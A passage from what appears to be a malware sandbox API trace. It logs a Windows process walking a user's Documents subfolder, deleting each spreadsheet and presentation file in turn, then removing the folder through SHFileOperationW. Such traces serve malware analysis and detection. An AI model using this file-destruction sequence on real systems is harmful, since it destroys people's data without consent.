lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6", lpFilePart=0x8bedfc*="Kji1x-v4FT0kOOxbY6") returned 0x3a [0263.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0263.167] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6")) returned 0x10 [0263.168] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe951730, ftCreationTime.dwHighDateTime=0x1d4cca9, ftLastAccessTime.dwLowDateTime=0xc395e470, ftLastAccessTime.dwHighDateTime=0x1d4c718, ftLastWriteTime.dwLowDateTime=0xc395e470, ftLastWriteTime.dwHighDateTime=0x1d4c718, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa59a0 [0263.168] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe951730, ftCreationTime.dwHighDateTime=0x1d4cca9, ftLastAccessTime.dwLowDateTime=0xc395e470, ftLastAccessTime.dwHighDateTime=0x1d4c718, ftLastWriteTime.dwLowDateTime=0xc395e470, ftLastWriteTime.dwHighDateTime=0x1d4c718, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0263.168] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76c0ab10, ftCreationTime.dwHighDateTime=0x1d4cad5, ftLastAccessTime.dwLowDateTime=0x7978b920, ftLastAccessTime.dwHighDateTime=0x1d4c9b7, ftLastWriteTime.dwLowDateTime=0x7978b920, ftLastWriteTime.dwHighDateTime=0x1d4c9b7, nFileSizeHigh=0x0, nFileSizeLow=0xa445, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="0o-xL2n93qfKmr3_SY.xls", cAlternateFileName="0O-XL2~1.XLS")) returned 1 [0263.168] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6\\0o-xL2n93qfKmr3_SY.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6\\0o-xl2n93qfkmr3_sy.xls")) returned 1 [0263.169] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440fc620, ftCreationTime.dwHighDateTime=0x1d4d317, ftLastAccessTime.dwLowDateTime=0xa9b438b0, ftLastAccessTime.dwHighDateTime=0x1d4cf54, ftLastWriteTime.dwLowDateTime=0xa9b438b0, ftLastWriteTime.dwHighDateTime=0x1d4cf54, nFileSizeHigh=0x0, nFileSizeLow=0x12b63, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="0rNuVVTraR4wMibRw.pptx", cAlternateFileName="0RNUVV~1.PPT")) returned 1 [0263.169] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6\\0rNuVVTraR4wMibRw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6\\0rnuvvtrar4wmibrw.pptx")) returned 1 [0263.170] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6112420, ftCreationTime.dwHighDateTime=0x1d4ca53, ftLastAccessTime.dwLowDateTime=0x9b3e0200, ftLastAccessTime.dwHighDateTime=0x1d4c853, ftLastWriteTime.dwLowDateTime=0x9b3e0200, ftLastWriteTime.dwHighDateTime=0x1d4c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="9KTaVpU", cAlternateFileName="")) returned 1 [0263.170] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8b3f20, ftCreationTime.dwHighDateTime=0x1d4cb63, ftLastAccessTime.dwLowDateTime=0xd3ed7530, ftLastAccessTime.dwHighDateTime=0x1d4c68d, ftLastWriteTime.dwLowDateTime=0xd3ed7530, ftLastWriteTime.dwHighDateTime=0x1d4c68d, nFileSizeHigh=0x0, nFileSizeLow=0x15ea6, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="LtRLVtJLWCH.xls", cAlternateFileName="LTRLVT~1.XLS")) returned 1 [0263.170] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6\\LtRLVtJLWCH.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6\\ltrlvtjlwch.xls")) returned 1 [0263.171] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda7e7c00, ftCreationTime.dwHighDateTime=0x1d4c651, ftLastAccessTime.dwLowDateTime=0x621b57a0, ftLastAccessTime.dwHighDateTime=0x1d4cf1c, ftLastWriteTime.dwLowDateTime=0x621b57a0, ftLastWriteTime.dwHighDateTime=0x1d4cf1c, nFileSizeHigh=0x0, nFileSizeLow=0x1461b, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="Mq557M3KsItRzaXlS.ppt", cAlternateFileName="MQ557M~1.PPT")) returned 1 [0263.171] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6\\Mq557M3KsItRzaXlS.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6\\mq557m3ksitrzaxls.ppt")) returned 1 [0263.172] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda7e7c00, ftCreationTime.dwHighDateTime=0x1d4c651, ftLastAccessTime.dwLowDateTime=0x621b57a0, ftLastAccessTime.dwHighDateTime=0x1d4cf1c, ftLastWriteTime.dwLowDateTime=0x621b57a0, ftLastWriteTime.dwHighDateTime=0x1d4cf1c, nFileSizeHigh=0x0, nFileSizeLow=0x1461b, dwReserved0=0x1c4b, dwReserved1=0x4, cFileName="Mq557M3KsItRzaXlS.ppt", cAlternateFileName="MQ557M~1.PPT")) returned 0 [0263.172] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0263.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.172] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0263.173] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0263.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.173] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0263.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0263.175] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Kji1x-v4FT0kOOxbY6", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6", lpFilePart=0x8bf658*="Kji1x-v4FT0kOOxbY6") returned 0x3a [0263.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0263.175] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kji1x-v4ft0kooxby6")) returned 0x10 [0263.176] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4